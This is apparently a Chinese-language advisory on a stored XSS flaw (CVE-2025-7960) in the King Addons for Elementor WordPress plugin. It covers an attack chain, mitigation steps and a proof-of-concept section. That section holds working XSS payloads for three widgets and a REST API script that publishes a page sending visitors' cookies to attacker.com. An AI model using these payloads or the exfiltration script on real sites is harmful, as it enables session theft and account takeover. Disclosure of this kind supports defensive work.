CVE-2025-7960 WordPress King Addons插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-7960

漏洞类型

存储型XSS

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

King Addons for Elementor (WordPress插件)

漏洞概述

CVE-2025-7960是WordPress平台King Addons for Elementor插件中的一个存储型跨站脚本(XSS)漏洞。该漏洞存在于插件的Pricing Slider(价格滑块)、Pricing Calculator(价格计算器)和Image Accordion(图片手风琴)小部件中。漏洞根源在于插件对用户提供的属性参数缺乏充分的输入清理和输出转义处理。攻击者通过利用此漏洞，可以在WordPress页面中注入任意JavaScript代码。由于是存储型XSS，恶意脚本会被永久保存在服务器端，任何访问含有恶意代码页面的用户都会执行这些脚本。攻击者利用此漏洞可窃取用户会话Cookie、劫持用户账户、进行钓鱼攻击或传播恶意软件。漏洞影响版本范围为所有版本至51.1.39版本。

技术细节

该漏洞属于存储型XSS(Stored Cross-Site Scripting)漏洞，攻击向量为网络(AV:N)，认证要求为低权限(PR:L)。攻击者需要拥有WordPress网站的贡献者(Contributor)级别或更高权限账户。攻击过程如下：攻击者首先登录WordPress后台，使用King Addons插件的Pricing Slider、Pricing Calculator或Image Accordion小部件创建或编辑页面。在这些小部件的属性参数中，攻击者注入恶意JavaScript代码，如<script>alert(document.cookie)</script>。由于插件未对这些用户输入进行适当的HTML转义，恶意代码会被直接存储在数据库中。当其他用户访问包含该恶意代码的页面时，浏览器会执行这些脚本，从而导致会话劫持或敏感信息窃取。漏洞的CVSS评分为6.4(中危)，主要影响机密性和完整性，低影响可用性。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标网站使用的WordPress版本和King Addons for Elementor插件版本，确认版本≤51.1.39

STEP 2

Authentication

攻击者获取WordPress贡献者(Contributor)级别或更高权限账户，可通过社会工程学、凭据填充或内部人员获取

STEP 3

Payload Injection

攻击者登录WordPress后台，在页面编辑器中使用King Addons插件的Pricing Slider、Pricing Calculator或Image Accordion小部件，注入恶意JavaScript代码到属性参数中

STEP 4

Storage

由于插件缺乏输入清理，恶意代码被直接存储在WordPress数据库中，无需管理员审核即可保存

STEP 5

Execution

当普通用户访问包含恶意代码的页面时，浏览器解析HTML并执行注入的JavaScript脚本，窃取Cookie或执行其他恶意操作

STEP 6

Impact

攻击者成功窃取用户会话Cookie，劫持管理员账户，获取网站完全控制权，或进一步渗透内网

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-7960 PoC: Stored XSS in King Addons for Elementor -->
<!-- Attack requires Contributor+ role access -->

<!-- Method 1: Pricing Slider Widget XSS -->
<div class="king-addons-pricing-slider"
     data-slider-value="1"
     data-slider-custom='"><script>alert(document.cookie)</script>'
     data-currency="$">
</div>

<!-- Method 2: Pricing Calculator Widget XSS -->
<div class="king-addons-pricing-calculator"
     data-formula='1+1"><img src=x onerror=alert(document.domain)>'
     data-result-text="Result">
</div>

<!-- Method 3: Image Accordion Widget XSS -->
<div class="king-addons-image-accordion"
     data-title='"><svg onload=alert(localStorage.getItem("wp_auth"))>'
     data-description="Description">
</div>

<!-- WordPress REST API Exploitation -->
<script>
// Auto-exploit using WordPress REST API
const wpEndpoint = '/wp-json/wp/v2/pages';
const maliciousContent = {
    'title': 'XSS Payload Page',
    'content': '<div class="king-addons-pricing-slider" data-slider-custom="><script>fetch("https://attacker.com/steal?c="+document.cookie)</script>"></div>',
    'status': 'publish'
};

fetch(wpEndpoint, {
    method: 'POST',
    headers: {
        'Content-Type': 'application/json',
        'X-WP-Nonce': wpApiSettings.nonce
    },
    body: JSON.stringify(maliciousContent)
});
</script>

影响范围

King Addons for Elementor <= 51.1.39

防御指南

临时缓解措施

临时缓解措施：1) 立即禁用或删除King Addons for Elementor插件；2) 恢复网站到漏洞披露前的备份版本；3) 清除所有被注入恶意代码的页面内容；4) 重置所有WordPress用户密码；5) 检查wp_options和wp_posts表中的异常脚本标签；6) 如果无法立即升级，可临时禁用受影响的小部件(Pricing Slider、Pricing Calculator、Image Accordion)；7) 使用Web应用防火墙(WAF)规则阻止包含script标签的请求参数。